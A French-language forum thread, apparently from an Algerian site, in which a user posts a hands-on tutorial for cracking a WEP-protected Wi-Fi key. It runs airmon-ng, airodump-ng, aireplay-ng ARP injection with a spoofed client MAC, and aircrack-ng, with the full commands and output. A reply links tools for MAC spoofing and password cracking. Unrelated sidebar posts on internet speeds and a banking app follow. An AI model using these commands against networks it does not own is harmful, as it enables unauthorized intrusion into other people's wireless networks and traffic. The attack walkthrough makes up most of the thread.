Aller au contenu
Règlement du forum ×
IPTV et arnaques ×

Cr@cké une cle WEP (injection ARP) [Reloded]


unkn0wn

Messages recommandés

avant tous j’espère que cette fois mon sujet ne disparaîtra pas pour je ne sais quelle raison.

 

et si il est supprimé sous prétexte que c'est pas légale de parlé de sa ou bien qu'il faut pas divulgué ce genre d'informations je vous pris de supprimé le forum sécurité informatique c'est mieux vous y gagnerais en espace et en temps

 




  1. images
    A tester seulement dans votre réseau local



  2. -


     

    Scénario:


    -Point d'accès wi-fi (AP) protégé par une clé WEP avec un ou plusieurs clients connecté


     

    logiciels requis:


    1- Un sniffer pour pouvoir exploré le réseau et détecté les points d'accès (AP) et les clients connecté


    2-Un injecteur de pâques pour stimulé le réseau afin de récupéré un max de DATA


    3-un *****er pour pouvoir déchiffré la clé wep


    je vous conseille la suite
    Aire.*****-ng
    qui contient tous les outilles nécessaire [airodump-ng, aireplay-ng, air*****-ng, airmon-ng]

    ou bien vous pouvez Utilisé la distribution

    BackTrack
    ,(en
    live cd
    ou avec une
    clé usb
    )

    Backtrack contient tous ce qu'il faut pour ce tutoriel


    NB: je précise que j'utilise un système d'exploitation "Linux"

     

     

    Notation:


    MAC
    : adresse mac de ma carte
    wi-fi

    BSSID
    : adresse MAC du point d'accée

    ESSID:
    nom du point d'accès

    Channel
    : le canal du point d'accès ( de 1 jusqu'à 12)


     

    Un peut de théorie:


    le WEP est un mécanisme simple de chiffrement de données, ce cryptage travaille avec l’algorithme
    RC4
    pour chiffrer les données et utilise des clés statiques de 64 ou 128 bits

     

    Le principe du WEP consiste à définir une clé sécrète qui doit être déclarée au niveau de chaque adaptateur sans fil du réseau (Clients) ainsi que sur le point d’accès (AP).

    La clé sert à créer un nombre pseudo-aléatoire d’une longueur égale à la longueur de la trame. Chaque élément du réseau voulant communiquer entre eux doit connaître la clé secrète qui va servir au cryptage WEP. Une fois mis en place, toutes les données transmises sont obligatoirement cryptées. Il assure ainsi l’encryptage des données durant leur transfert ainsi que leurs intégrités.

     

    pour les failles on peut cité:

    - le cryptage RC4 présente des faiblesses.

    - La clé de session partagée par toutes les stations est statique. Cela signifie que pour déployer un grand nombre de stations WiFi, il est nécessaire de les configurer en utilisant la même clé de session – ceci ayant pour conséquence que la connaissance de la clé est suffisante pour déchiffrer les communications.

    - De plus, 24 bits de la clé servent uniquement pour l’initialisation, ce qui signifie que seuls 40 bits de la clé de 64 bits servent réellement à chiffrer et 104 bits pour la clé de 128 bits.

     

    Pour pouvoir cr@cké cette clé WEP on vas:


    1-sniffer le réseau pour voir les points d'acceé

    2-stimulé le trafique en injectant des paquets pour récupéré le max de clé de session

    3-kr@cké les clé de session pour avoir la clé

     

     

    Pratique:


    1- mètre la carte Wi-Fi en mode moniteur avec "airmon-ng":


    [le mode moniteur veut dire que notre carte wi-fi vas écouté sur le réseau et récupéré les Pâques même si ils ne sont pas destiné a nous]


     

    [root@darkstar ]# iwconfig
    lo        no wireless extensions.
    eth0      no wireless extensions.
    wmaster0  no wireless extensions.
    wlan0 IEEE 802.11bg Mode:Managed Frequency:2.462 Retry min limit:7 RTS thr:of Fragment thr=2352 
    


    Dans ce cas ma carte wi-fi est wlan0 et elle est en mode Managed

     

    [root@darkstar# airmon-ng start wlan0
    Interface       Chipset         Driver
    wlan0           Atheros         ath5k - [phy0]
                                   (monitor mode enabled on mon0)
    


    notez que le mode moniteur est activé sur
    mon0
    , c'est parce que ma carte est une
    Atheros
    elle peut crée des carte virtuelle

     

     

    on peut vérifier avec
    iwconfig


    
    [root@darkstar dragoun]# iwconfig
    
    lo        no wireless extensions.
    eth0      no wireless extensions.
    wlan0    IEEE 802.11bg  ESSID:""
                Mode:Managed  Frequency:2.412 GHz 
    
    mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz RTS thr:off Power Management:ofLink Quality:0 Signal level:0 Noise level:0
    

    2-Sniffer le réseau et détecté les points d'accès et les clients
    :

     

     

    [root@darkstar dragoun]# airodump-ng mon0

    qui me renvoi ce résultat


     

     

    image_1.png





    1:
    BSSID
    => adresse MAC du point d'accée


    2:
    #DATA
    =>les pâques récupéré,qui vont servir a avoir la clé WEP


    3:
    ENC
    => type de cryptage [ dans ce cas WEP]


    4:
    ESSID
    => Nom du point d'accé


    5:
    STATION
    => L'adresse MAC d'un client qui est connecté sur le point d'accès


    -j'ai oublier d'encadré:
    CH
    (entre #DATA et ENC) => canal du point d'accès


     

    maintenant qu'on a l'adresse MAC de (AP) et le canal on vas commencé a sniffé sur ce canal avec la commande suivante :


    
    [root@darkstar ]# airodump-ng -w /home/*****/*****-wep -c 1 -b 00:90:D0:DC:B1:E2 mon0
    


     


    -w
    : le fichier ou on vas sauvegardé les pâques capturé (qui sera utilisé par
    air*****-ng
    âpre)

    -c 1
    : sniffé sur le canal 1

    -b
    : sniffer seulement les pâques émis par cette adresse MAC 00:90:D0:DC:B1:E2 (AP)

    mon0
    : interface a utilisé


     

    ce qui renvoi le résultat suivant


    image_2.png



     


    on remarque qu'on 1e minute on a récupéré
    2077
    #DATA

     

     

    pour cr@cké une clé de 64 bits il nous faut minimum
    10.000 data
    et pour une 128 bits il faut
    50.000 data
    , ou plus


    dans ce cas on ne connais pas le type de la clé, supposant qu'elle soit une 128 bits


     

     

    3- Injecter des paquet:

     

    afin d'avoir nos
    50.000 DATA
    rapidement on vas encore stimulé le réseau en envoyant des pâques
    ARP
    a l'AP en utilisant l'adresse MAC du client connecté comme adresse source (
    spoofé l'adresse MAC du client
    )


     

    [root@darkstar ]# aireplay-ng -3  -e SpeedTouch345B2D -a  00:90:D0:DC:B1:E2  -h 00:19:7E:01:A3:70 mon0


     


    - 3
    : pour dire qu'il faut injecter des pâques ARP

    - e
    : nom du point d'accés

    - a
    : adresse MAC du point d'accès

    - h
    : adresse MAC du client (pour faire croire que les pâques viennent de lui)

    mon0
    : interface wi-fi



    - Apré 15 minutes on remarque qu'on a récupéré
    56.689 DATA
    ce qui suffit même pour une clé 128 bits


    image_4.png



     



     

    4- cr@cké les paquets:

     

    on récupéré le fichier enregistré avec
    airodump-ng
    et on en le ***** avec
    air*****-ng


    
    [root@darkstar ]# air*****-ng /home/*****/*****-wep-01.cap -b 00:90:D0:DC:B1:E2
    

    *****-wep-01.cap
    : fichier sur le quelle on a sauvegardé les
    pâques avec
    airodump-ng


    -b
    : adresse de AP



    image_3.png




    KEY FOUND!===> en ASCII sa donne :"aabbccddeeff1"

  3. +

    EDIT CONTENU HORS CHARTE

    [/color]


Modifié par ReDhAx
  • Like 1
Lien vers le commentaire
Partager sur d’autres sites

pour ceux qui disent que la protection par filtrage d'adresse MAC est suffisante => http://www.alobbs.com/macchanger/

pour ceux qui croix qu'un bon mots de passe ne peut pas être cr@cké => http://code.google.com/p/pyrit/

pour ceux qui croix qu'on fait tts sa juste pour avoir accée a internet => http://www.torrentreactor.net/torrents/3273984/DEFCON-17

Lien vers le commentaire
Partager sur d’autres sites

Rejoindre la conversation

Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.

Invité
Répondre à ce sujet…

×   Collé en tant que texte enrichi.   Coller en tant que texte brut à la place

  Seulement 75 émoticônes maximum sont autorisées.

×   Votre lien a été automatiquement intégré.   Afficher plutôt comme un lien

×   Votre contenu précédent a été rétabli.   Vider l’éditeur

×   Vous ne pouvez pas directement coller des images. Envoyez-les depuis votre ordinateur ou insérez-les depuis une URL.

  • Messages

    • L'Algérie se classe au 157ème rang mondial avec 13,63 méga en Download et 3,26 méga en upload au classement de mars 2024 après une augmentation temporaire du débit en 6 jours avant le Ramadan, selon le site speedtest ,en attendant le classement du mois d'avril, car ce mois-ci  a eu une augmentation officielle du débit Internet, valable jusqu'au 9 mai .On remarquons une amélioration , notamment dans l'upload par rapport aux statistiques de les mois précédents, l'upload était toujours de 0,9 Méga, mais maintenant la vitesse moyenne de upload dans toute l'Algérie est  3,26 méga, ce qui indique la modernisation de la fibre .La vitesse moyenne de l'Internet  à Alger est 17,83 Mbps et 7,13 Mbit/s en upload. La meilleure vitesse moyenne de l'Internet  dans toutes les villes algériennes est la ville de Mahelma  à Alger, avec une vitesse moyenne de 35,58 Mbps et de 12,98 Mbps en upload. voici le lien pour ceux qui veut voir le classement de chaque wilaya : https://www.speedtest.net/performance/algeria/algiers
    • je réponds à ma propre question vu que personne ne l'a fait: voici le details que j'avais pas lu sur le site de la BNA (qui est bien fait)   WIMPAY-BNA  ? Disposer d’un système IOS ou Android ; Disposer d’une connexion internet ; Télécharger l’application ; Etre abonné au service « BNA.net » OU au service « Pack WIMPAY-BNA » OU être porteur d’une carte CIB et utilisateur du service SMS OTP (pour les opérations de e-Paiement).   Comment ça marche ? Cas client abonné au service « BNA.net » : Télécharger et installer l’application sur smartphone ; Utiliser l’identifiant et le mot de passe du service « BNA.net » ; Renseigner les informations du client ; Insertion d’un code d’utilisation personnel ; Acceptation des conditions générales d’utilisation ; Validation de la phase d’inscription en saisissant le mot de passe OTP reçu par SMS ou par email.   Cas client abonné au service « Pack WIMPAY-BNA » L’inscription à ce service est offerte gratuitement à chaque client particulier détenteur d’un compte chèque : – Au niveau de l’agence Création de l’abonnement au service « Pack WIMPAY-BNA » par le chargé de clientèle ; – Sur l’application : Réception d’un mail de confirmation comportant l’email d’identification et un code d’accès à usage unique ; Saisie de l’adresse mail d’identification et le code reçu par email ; Réception par SMS d’un mot de passe OTP ; Saisir le mot de passe reçu par SMS afin de valider l’inscription ; Acceptation des conditions générales d’utilisation ; Création d’un code PIN ; Création d’un mot de passe personnalisé.   Cas client porteurs de cartes CIB et utilisateurs du services SMS OTP (pour les opérations de e-Paiement) Ce service est offert gratuitement aux clients détenteurs de cartes CIB et utilisateurs du services SMS OTP (e-Paiement) : Choisir le mode de souscription « Par carte » ; Renseigner les six (06) premiers chiffres, les quatre (04) derniers chiffres et la date d’expiration de la carte CIB ; Renseigner un numéro de téléphone valide afin de recevoir un SMS OTP; Introduire le mot de passe OTP reçu pour la validation de l’inscription ; Renseigner les informations du client ; Insertion d’un code d’utilisation personnel ; Acceptation des conditions générales d’utilisation ; Création du mot de passe personnel WIMPAY.  
×
×
  • Créer...